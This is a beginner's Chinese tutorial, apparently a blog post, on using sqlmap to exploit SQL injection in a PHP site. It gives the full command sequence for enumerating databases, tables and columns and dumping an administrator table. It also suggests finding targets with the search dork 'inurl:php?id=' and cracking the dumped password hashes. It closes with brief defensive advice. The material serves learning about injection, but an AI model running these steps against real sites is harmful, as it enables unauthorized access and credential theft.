友情提示

初入安全，小白一个，本文重在学习与经验分享！

背景

利用sqlmap工具对存在SQL注入漏洞的Web站点进行SQL注入漏洞的自动注入，爆出用户账号信息。

1. 实验环境

本次实验是对MySQL数据库进行sqlmap工具的自动注入。

靶机 Web URL：

注：查找Web站点的动态页面，即需要到数据库中取数据并将数据返回到web页面的展示的URL进行SQL注入，可以使用搜索引擎搜索”inurl:php?id=”获取动态页面。

2. SQL注入漏洞原理

在动态页面的URL后面输入一些与查询相关的SQL语句（如：条件判断、排序、union联合查询语句），web页面正常显示或者报错显示，说明web页面将你输入的SQL语句没有做任何的处理，直接带入到数据库中进行了select查询并将结果返回给web页面展示，只不过是由于你写的SQL语句正确或者存在错误，导致页面正常显示或者报错显示。

如果出现这种将SQL语句带入到数据库中进行正常查询的情况，基本上就存在SQL注入的漏洞了。

3. sqlmap软件安装与配置

（1）下载sqlmap工具软件

下载地址：

（2）安装python环境

sqlmap工具是基于python语言开发的，所以需要安装python环境才能运行。

下载地址：

# 根据自己系统的实际情况，选择合适的版本下载并按照提示默认安装即可

# 在命令提示符窗口输入”python –version”命令且出现以下提示信息，说明python环境安装成功

（3）安装sqlmap软件

# 将下载下来的sqlmap软件解压到自己喜欢的目录。

# 此时就可以进入到sqlmap程序的主目录运行”python sqlmap.py”命令，如果出现以下提示信息，说明sqlmap工具安装成功。

# 因为每次都进入sqlmap工具主目录执行程序会比较麻烦，为了可以在任意目录执行sqlmap命令，可以将sqlmap目录添加到系统环境变量，这样就只需要打开命令提示符窗口就可以执行sqlmap命令了。

# 添加成功后，重启命令提示符窗口，直接运行”sqlmap.py”命令即可

4. sqlmap工具自动注入过程

（1）判断URL是否存在SQL注入漏洞：

sqlmap命令： sqlmap.py -u “#34;

# 如果存在漏洞，会列出来sql注入漏洞的类型

# 不需要理解此sql注入漏洞的类型原理，有漏洞，那就简单粗暴点，直接用工具爆破

（2）在存在sql注入漏洞的注入点，爆出所有的数据库名

sqlmap命令： sqlmap.py -u “#34; –dbs –batch

# –dbs参数，爆出所有的数据库名

# 加上”–batch”参数，可以不用每次都输入”Y”来同意后续操作，直接自动运行简单粗暴

（3）在爆出所有的数据库名后，再继续爆出某个数据库中所有的表名

sqlmap命令： sqlmap.py -u “#34; -D xycms –tables –batch

# -D 参数指定需要爆的库名，如：本实验数据库名为”xycms”

# –tables 参数，爆出所有的表名

（4）在爆出所有的数据库中的表名后，再继续爆出某张表的列名与列类型

# 找到其中存储用户账户信息的表，再爆列名与列类型

sqlmap命令： sqlmap.py -u “#34; -D xycms -T manage_user –columns –batch

# -T 参数指定需要爆的表名，如：本实验表名为”manage_user”

# –columns 参数，爆出某张表的列名以及列类型

（5）在爆出所有的数据库中的表的列名后，再继续爆出某张表的列内容

# 找到其中存储用户账户信息的表，再爆列内容

sqlmap命令： sqlmap.py -u “#34; -D xycms -T manage_user -C id,m_name,m_pwd –dump –batch

# -C 参数，指定需要爆的某张表的某些列的列名，如：本实验指定列名为id,m_name,m_pwd

# –dump 参数，爆出表的列内容

成功爆出此站点后台管理员的账号信息。其中用户口令是加密的，可以用密码爆破工具解密此密文。如：在线爆破工具：www.cmd5.com、离线爆破工具：john the ripper

3. 安全建议

（1）在动态页面中增加字符替换、特殊字符检查等相关函数，对页面输入的内容进行安全检查。

（2）部署web应用防火墙（WAF）。